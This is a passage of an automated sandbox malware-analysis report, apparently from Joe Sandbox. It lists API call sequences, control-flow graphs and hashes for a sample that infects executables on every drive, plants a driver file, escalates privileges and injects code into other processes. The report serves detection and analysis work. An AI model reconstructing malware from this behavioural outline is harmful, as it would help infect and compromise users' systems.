                                                                                                            • GetTickCount.KERNEL32 ref: 009043AA
                                                                                                            • wsprintfA.USER32 ref: 009043BD
                                                                                                            • lstrlen.KERNEL32(?,008F3E34,?), ref: 00904474
                                                                                                            • wsprintfA.USER32 ref: 00904482
                                                                                                            • lstrcat.KERNEL32(?,008F226C), ref: 009044B8
                                                                                                            • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,00000080), ref: 009044C8
                                                                                                            • lstrlen.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys), ref: 009044D3
                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,008F3E38), ref: 009044EF
                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,008F2288), ref: 00904501
                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,?), ref: 00904513
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00020000), ref: 00904520
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00020000), ref: 00904532
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$lstrcat$AddressProcValuelstrcpy$Close$Open$Filewsprintf$Name$AllocCountCreateDirectoryGlobalLibraryLoadTick$ComputerDeleteHandleMappingModulePathSystemTempUserWindows
                                                                                                            • String ID: 44775622570$C:\Windows\npqqe.log$C:\Windows\system32\drivers\lrohpn.sys$Software\$Software\Msoga$joneC:\Windows\$n
                                                                                                            • API String ID: 1097455987-1144511912
                                                                                                            • Opcode ID: f46d28b3af1446b1d01ff4a7b8d73dfa934b7ae52f8af386779d1f5dc5a343be
                                                                                                            • Instruction ID: 39dc5da75d0c5f8e9457a9e6660c5dec058639278f4bf8db0fd851491e1a48b1
                                                                                                            • Opcode Fuzzy Hash: f46d28b3af1446b1d01ff4a7b8d73dfa934b7ae52f8af386779d1f5dc5a343be
                                                                                                            • Instruction Fuzzy Hash: FB42C4B1A41618EFDF14DBA4EC8CBAA77B5FF48705F00429AE309A6291DB745AC0CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlocked
                                                                                                            • String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$PE$_lopen$d$d$d
                                                                                                            • API String ID: 367298776-1942104897
                                                                                                            • Opcode ID: 8d599707097974b53247caa0b6564088869976e7074002b2d8a2460fc9452fdc
                                                                                                            • Instruction ID: e2344f454cd475b3f6027d1ed85cb3e7496464ae74895b2c8a9e727ff08a21eb
                                                                                                            • Opcode Fuzzy Hash: 8d599707097974b53247caa0b6564088869976e7074002b2d8a2460fc9452fdc
                                                                                                            • Instruction Fuzzy Hash: 2A3304B5A01618DFDB24CF54CC84BE9B7B6BF84304F1881E9E20AAB291D7359E85CF54

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 613 903062-903188 call 908060 call 8f44cb Sleep call 902fff 620 90318b-9031a5 call 8fe329 613->620 623 9031b4-9031be 620->623 624 9031a7-9031b2 Sleep 620->624 625 903744-903777 RtlExitUserThread 623->625 626 9031c4-9031ce 623->626 624->620 626->625 628 9031d4-9031e0 626->628 628->625 629 9031e6-9031f3 628->629 629->625 630 9031f9-903200 629->630 630->625 631 903206-90324e call 902ebc Sleep GetLogicalDrives 630->631 635 903734-90373f Sleep 631->635 636 903254-903272 631->636 635->630 637 903278-9032b6 GetDriveTypeA 636->637 638 90372f 636->638 637->638 639 9032bc-9032f9 lstrcat CreateFileA 637->639 638->635 640 903522-90353c GetFileAttributesA 639->640 641 9032ff-903337 GetFileTime FileTimeToSystemTime 639->641 642 903569-903592 CreateFileA 640->642 643 90353e-903566 SetFileAttributesA DeleteFileA call 8fa2ad 640->643 644 903515-90351c CloseHandle 641->644 645 90333d-903359 641->645 642->638 647 903598-90361d GetSystemTime SystemTimeToFileTime call 8fa16b call 8f44cb 642->647 643->642 644->640 645->644 648 90335f-9033b4 call 8f4060 ReadFile CharLowerA lstrlen 645->648 659 903633-90363f lstrcat 647->659 660 90361f-903631 lstrcat 647->660 655 903510 648->655 656 9033ba-9033d7 call 8f8deb 648->656 655->644 656->655 663 9033dd-9033f0 656->663 662 903645-9036ed call 902b8e lstrlen WriteFile SetFileTime CloseHandle SetFileAttributesA CreateFileA 659->662 660->662 662->638 668 9036ef-903729 WriteFile CloseHandle SetFileAttributesA 662->668 663->655 667 9033f6-9033ff 663->667 669 903405-903417 667->669 670 90350b 667->670 668->638 671 903422-903425 669->671 672 903419-90341f 669->672 670->655 673 90342b-903437 671->673 672->671 674 903465-90348f lstrcpy GetFileAttributesA 673->674 675 903439-903445 673->675 677 903491-9034c7 CloseHandle CreateFileA 674->677 678 903509 674->678 675->674 676 903447-903452 675->676 676->674 679 903454-903463 676->679 677->678 680 9034c9-903503 WriteFile CloseHandle SetFileAttributesA 677->680 678->655 679->673 680->678
                                                                                                            APIs
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • Sleep.KERNEL32 ref: 00903176
                                                                                                              • Part of subcall function 00902FFF: CreateFileA.KERNEL32(0090382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0090382E), ref: 0090302B
                                                                                                              • Part of subcall function 00902FFF: WriteFile.KERNEL32(000000FF,008D26B0,00000401,00000000,00000000), ref: 0090304E
                                                                                                              • Part of subcall function 00902FFF: CloseHandle.KERNEL32(000000FF), ref: 00903058
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 009031AC
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 00903210
                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00903220
                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 009032A3
                                                                                                            • lstrcat.KERNEL32(?,008F2740), ref: 009032CA
                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 009032E6
                                                                                                            • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0090331B
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0090332F
                                                                                                            • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 00903391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$SleepTime$Create$CloseDriveDrivesExchangeHandleInterlockedLogicalReadSystemTypeWritelstrcat
                                                                                                            • String ID: .exe$.pif$:$\
                                                                                                            • API String ID: 2892063643-4138429844
                                                                                                            • Opcode ID: 27e276337a268eb91f7db6f3f4545d567f4ef4376a8fc81eec1e7ec5cd349fe8
                                                                                                            • Instruction ID: 5c9634388f8dad924b0a7613c6e1b3d90b05c3178a34d2f6475f0204477fcb2f
                                                                                                            • Opcode Fuzzy Hash: 27e276337a268eb91f7db6f3f4545d567f4ef4376a8fc81eec1e7ec5cd349fe8
                                                                                                            • Instruction Fuzzy Hash: 2B027DB5901268AFDF24DB64DC88BEAB779BF49700F0086D9E209E62D0D7749B94CF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 681 901ef6-901ff4 call 908060 OpenProcess 684 9021a7-9021bf OpenProcessToken 681->684 685 901ffa-902003 GetLastError 681->685 686 9021c1-9021c8 684->686 687 9021cd-9021e9 GetTokenInformation 684->687 688 902009-902040 GetVersionExA 685->688 689 90219b-9021a2 685->689 690 9024ab-9024b2 686->690 693 9021f7-902200 GetLastError 687->693 694 9021eb-9021f2 687->694 691 902042-902049 688->691 692 90204e-902072 GetCurrentThread OpenThreadToken 688->692 689->690 695 9024b4-9024c1 CloseHandle 690->695 696 9024cb-9024d2 690->696 691->690 697 9020b3-902103 LookupPrivilegeValueA AdjustTokenPrivileges 692->697 698 902074-90207f GetLastError 692->698 699 902202-902209 693->699 700 90220e-902231 GetProcessHeap RtlAllocateHeap 693->700 694->690 695->696 703 9024e1-9024e8 696->703 704 9024d4-9024db CloseHandle 696->704 701 902105-902119 CloseHandle 697->701 702 90211e-902129 GetLastError 697->702 705 902081-902088 698->705 706 90208d-9020a5 GetCurrentProcess OpenProcessToken 698->706 699->690 707 902233-90223a 700->707 708 90223f-902265 GetTokenInformation 700->708 701->690 711 902144-90218b OpenProcess AdjustTokenPrivileges CloseHandle 702->711 712 90212b-90213f CloseHandle 702->712 713 902500-902513 703->713 714 9024ea-9024fa GetProcessHeap HeapFree 703->714 704->703 705->690 706->697 715 9020a7-9020ae 706->715 707->690 709 902273-9022b9 LookupAccountSidA 708->709 710 902267-90226e 708->710 716 9022c7-9022d0 709->716 717 9022bb-9022c2 709->717 710->690 718 902199 711->718 719 90218d-902194 711->719 712->690 714->713 715->690 720 902330-902337 716->720 721 9022d2-9022e6 lstrcmpiA 716->721 717->690 718->684 719->690 720->690 722 902314-902329 CreateMutexA 721->722 723 9022e8-9022fc lstrcmpiA 721->723 722->690 723->722 724 9022fe-902312 lstrcmpiA 723->724 724->722 725 90232e-902364 VirtualAllocEx 724->725 727 902366-90238a WriteProcessMemory 725->727 728 9023cd-9023f5 VirtualAllocEx 725->728 731 902398-9023b8 CreateRemoteThread 727->731 732 90238c-902393 727->732 729 902492-902499 728->729 730 9023fb-902455 call 90772b lstrlen call 90772b WriteProcessMemory 728->730 729->690 739 902460-902480 CreateRemoteThread 730->739 740 902457-90245e 730->740 734 9023c6 731->734 735 9023ba-9023c1 731->735 732->690 734->728 735->690 741 902482-902489 739->741 742 90248b 739->742 740->690 741->690 742->729
                                                                                                            APIs
                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 00901FE1
                                                                                                            • GetLastError.KERNEL32 ref: 00901FFA
                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 00902033
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00902063
                                                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 0090206A
                                                                                                            • GetLastError.KERNEL32 ref: 00902074
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 009021B7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009024BB
                                                                                                            • CloseHandle.KERNEL32(?), ref: 009024DB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009024F3
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009024FA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OpenProcess$CloseErrorHandleHeapLastThreadToken$CurrentFreeVersion
                                                                                                            • String ID: P$SeDebugPrivilege$local service$network service$system
                                                                                                            • API String ID: 3470919082-3830299594
                                                                                                            • Opcode ID: 865cec2aef168af06878f684d27511a6d98a0d1b696c144cf9357fdca1c12277
                                                                                                            • Instruction ID: 4df4ba10d8f5e6403fd7c296139e53c31c80cffcc19dbe1f4550cd10650bcf42
                                                                                                            • Opcode Fuzzy Hash: 865cec2aef168af06878f684d27511a6d98a0d1b696c144cf9357fdca1c12277
                                                                                                            • Instruction Fuzzy Hash: 7CF16C75A01218EFEB20DFA4CC4DBEEB778FB48725F104699E229A61D0D7B45A84CF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 743 901060-9010d2 Sleep 744 9010d4-9010e9 lstrcat 743->744 745 9010ec-9010ff call 8f8deb 743->745 744->745 748 901101-901112 745->748 749 901117-90113b lstrcat FindFirstFileA 745->749 750 9014c8-9014d8 748->750 751 901141-901151 FindNextFileA 749->751 752 90144c-901457 749->752 751->752 753 901157-901161 751->753 754 901492-9014af 752->754 755 901459-901461 752->755 757 901163 753->757 758 901165-90116e 753->758 761 9014b1-9014b5 FindClose 754->761 762 9014bb-9014c6 Sleep 754->762 755->754 759 901463-901467 755->759 757->751 763 901170 758->763 764 901175-901179 758->764 759->754 760 901469-90146d 759->760 760->754 765 90146f-901488 call 900e71 760->765 761->762 762->750 763->752 766 90117b-901199 Sleep 764->766 767 90119f-9011b7 lstrlen 764->767 765->754 766->767 768 9011c7-901201 lstrcat lstrlen * 2 767->768 769 9011b9-9011c2 767->769 771 901297-9012a2 768->771 772 901207-90121c lstrcmpiA 768->772 769->751 774 901381-901394 771->774 775 9012a8-9012b0 771->775 776 901236-90123d 772->776 777 90121e-901234 lstrcmpiA 772->777 779 90139a-9013a4 774->779 780 90143e-901447 774->780 775->774 778 9012b6-9012c0 775->778 781 901248-901257 776->781 777->771 777->776 782 9012c2-9012d8 call 8f8deb 778->782 783 90133d-901353 call 8f8deb 778->783 779->780 784 9013aa-9013f5 lstrcpy lstrlen lstrcmpiA 779->784 780->751 785 901287-901294 call 8fe329 781->785 786 901259-901275 call 8f8deb 781->786 782->783 798 9012da-9012f0 call 8f8deb 782->798 783->774 802 901355-901368 call 900cf6 783->802 789 901424-90143b 784->789 790 9013f7-90141c call 901060 784->790 785->771 800 901285 786->800 801 901277-901282 call 8fa26e 786->801 789->780 799 901421 790->799 798->783 812 9012f2-901338 lstrcpy lstrcat 798->812 799->789 800->781 801->800 810 901374-901378 802->810 811 90136a-90136e DeleteFileA 802->811 810->774 813 90137a 810->813 811->810 812->783 813->774
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(?,?), ref: 009010BF
                                                                                                            • lstrcat.KERNEL32(?,008F3D20), ref: 009010DD
                                                                                                            • lstrcat.KERNEL32(?,008F3D24), ref: 00901120
                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0090112E
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00901149
                                                                                                            • Sleep.KERNEL32(?), ref: 00901199
                                                                                                            • lstrlen.KERNEL32(?), ref: 009011A6
                                                                                                            • lstrcat.KERNEL32(?,?), ref: 009011DB
                                                                                                            • lstrlen.KERNEL32(?), ref: 009011E5
                                                                                                            • lstrlen.KERNEL32(?), ref: 009011F8
                                                                                                            • lstrcmpiA.KERNEL32(00000000,008F26F0), ref: 00901214
                                                                                                            • lstrcmpiA.KERNEL32(00000000,008F26F8), ref: 0090122C
                                                                                                            • lstrcpy.KERNEL32(-0096B270,?), ref: 0090130C
                                                                                                            • lstrcat.KERNEL32(-0096B270,.lnk), ref: 0090132A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0090136E
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 009013B8
                                                                                                            • lstrlen.KERNEL32(?), ref: 009013C5
                                                                                                            • lstrcmpiA.KERNEL32(?,008F260C), ref: 009013ED
                                                                                                            • FindClose.KERNEL32(00000000), ref: 009014B5
                                                                                                            • Sleep.KERNEL32(00000400), ref: 009014C0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcatlstrlen$FileFindSleeplstrcmpi$lstrcpy$CloseDeleteFirstNext
                                                                                                            • String ID: .lnk$.lnk$.lnk$.tmp$C:\Windows\$d
                                                                                                            • API String ID: 3707883041-2096895072
                                                                                                            • Opcode ID: 4fd493fdaa35d675bd6e8ed897bbbff63975b794789388c99cd7fd774f76b1dd
                                                                                                            • Instruction ID: 57a27262834eee6f9a34c3fede589f6f6e8912a58c3417791a6faf0159ff3a61
                                                                                                            • Opcode Fuzzy Hash: 4fd493fdaa35d675bd6e8ed897bbbff63975b794789388c99cd7fd774f76b1dd
                                                                                                            • Instruction Fuzzy Hash: 50D18AB5A00209AFCF14DF68DC84BAE7BB9FF48305F148219F915AB291D738E950CB64

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00902545
                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00902584
                                                                                                            • lstrlen.KERNEL32(?,00000002,00000000), ref: 009025A5
                                                                                                            • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 009025C0
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 009025D6
                                                                                                            • CharLowerA.USER32(00000000), ref: 009025E3
                                                                                                            • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 009025FC
                                                                                                            • wsprintfA.USER32 ref: 0090260A
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0090261E
                                                                                                            • GetLastError.KERNEL32 ref: 0090262A
                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 0090263D
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0090264A
                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0090267D
                                                                                                            • lstrlen.KERNEL32(?,00000000,00000128,00000002,00000000), ref: 0090269E
                                                                                                            • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 009026B9
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 009026CF
                                                                                                            • CharLowerA.USER32(00000000), ref: 009026DC
                                                                                                            • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 009026F5
                                                                                                            • wsprintfA.USER32 ref: 00902703
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00902717
                                                                                                            • GetLastError.KERNEL32 ref: 00902723
                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 00902736
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00902743
                                                                                                            • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 00902774
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Mutexlstrlen$CloseCreateHandle$CharErrorLastLowerProcess32Releaselstrcpylstrcpynwsprintf$FirstNextSnapshotToolhelp32
                                                                                                            • String ID: M_%d_$M_%d_
                                                                                                            • API String ID: 3105503624-485321427
                                                                                                            • Opcode ID: a3ac2236159a583fda0069eb98438a99fd13ea51410dfe5060f97fcebbe598f5
                                                                                                            • Instruction ID: d3484a3fd381e4cd8fc5f5121891272da1498823a3a61d54a71adb2cbf325244
                                                                                                            • Opcode Fuzzy Hash: a3ac2236159a583fda0069eb98438a99fd13ea51410dfe5060f97fcebbe598f5
                                                                                                            • Instruction Fuzzy Hash: 4B512FB5901218AFDF20DBA0DC8CBE9B778BF58701F1046DAE749A6190DBB49AC4CF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1005 8fa2f5-8fa3a4 call 8f44cb Sleep GetTempPathA lstrlen 1008 8fa3b8-8fa3bf 1005->1008 1009 8fa3a6-8fa3b2 lstrcat 1005->1009 1010 8fa3c5-8fa435 lstrlen lstrcpy lstrcat call 8f4060 FindFirstFileA 1008->1010 1011 8fa542-8fa550 RtlExitUserThread 1008->1011 1009->1008 1014 8fa51c-8fa523 1010->1014 1015 8fa43b-8fa451 FindNextFileA 1010->1015 1016 8fa525-8fa52c FindClose 1014->1016 1017 8fa532-8fa53d Sleep 1014->1017 1015->1014 1018 8fa457-8fa49c lstrcat lstrlen * 2 1015->1018 1016->1017 1017->1008 1019 8fa49e-8fa4b7 lstrcmpiA 1018->1019 1020 8fa4ca-8fa4d5 1018->1020 1019->1020 1021 8fa4b9-8fa4c2 call 8fa26e 1019->1021 1022 8fa50c-8fa517 Sleep 1020->1022 1023 8fa4d7-8fa4e1 1020->1023 1026 8fa4c7 1021->1026 1022->1015 1023->1022 1025 8fa4e3-8fa4fb lstrcmpiA 1023->1025 1025->1022 1027 8fa4fd-8fa509 call 8fa2ad 1025->1027 1026->1020 1027->1022
                                                                                                            APIs
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • Sleep.KERNEL32 ref: 008FA374
                                                                                                            • GetTempPathA.KERNEL32(00000100,00000000), ref: 008FA386
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA393
                                                                                                            • lstrcat.KERNEL32(00000000,008F3CAC), ref: 008FA3B2
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA3CC
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FA3E6
                                                                                                            • lstrcat.KERNEL32(00000000,008F3CB0), ref: 008FA3F8
                                                                                                            • FindFirstFileA.KERNEL32(00000000,00000000), ref: 008FA422
                                                                                                            • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 008FA449
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 008FA473
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA480
                                                                                                            • lstrlen.KERNEL32(?), ref: 008FA493
                                                                                                            • lstrcmpiA.KERNEL32(00000000,008F26F0), ref: 008FA4AF
                                                                                                            • lstrcmpiA.KERNEL32(00000000,_Rar), ref: 008FA4F3
                                                                                                            • Sleep.KERNEL32(00000100), ref: 008FA511
                                                                                                            • FindClose.KERNEL32(00000000), ref: 008FA52C
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 008FA537
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008FA544
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FindSleeplstrcat$Filelstrcmpi$CloseExchangeExitFirstInterlockedNextPathTempThreadUserlstrcpy
                                                                                                            • String ID: _Rar
                                                                                                            • API String ID: 932915221-536834240
                                                                                                            • Opcode ID: 135c3a3bded27a035731bf55f6356754e7c49eda68753fc6a7a9ad56999d66af
                                                                                                            • Instruction ID: 8712ffe2504b32a956f07d94ac98a3faa33ae907961ecafd8f82ebf49c1f71b8
                                                                                                            • Opcode Fuzzy Hash: 135c3a3bded27a035731bf55f6356754e7c49eda68753fc6a7a9ad56999d66af
                                                                                                            • Instruction Fuzzy Hash: 4751ADB1901618ABDF24DBA4DC48BEE7779FF48705F0045A9E20EE6190DA74ABC4CF51
                                                                                                            APIs
                                                                                                            • htons.WS2_32(00000EB0), ref: 008F7AE9
                                                                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 008F7B06
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 008F7B44
                                                                                                            • bind.WS2_32(?,00000002,00000010), ref: 008F7B5A
                                                                                                            • closesocket.WS2_32(?), ref: 008F7C31
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F7C39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3895830221-0
                                                                                                            • Opcode ID: 1f456171f0ed5fd0199d58a4b0cbcf3251c77f4cad27b62b42c74b7e21bee3ef
                                                                                                            • Instruction ID: baa211eb9d86d8456da0e636d0fddc900653b874a8c1d590ddb47080d4fef89c
                                                                                                            • Opcode Fuzzy Hash: 1f456171f0ed5fd0199d58a4b0cbcf3251c77f4cad27b62b42c74b7e21bee3ef
                                                                                                            • Instruction Fuzzy Hash: F5513A70A05398AAEB209F64DD49BE9B7B4FF08740F1042D9E389EA290D7F45AC49F54
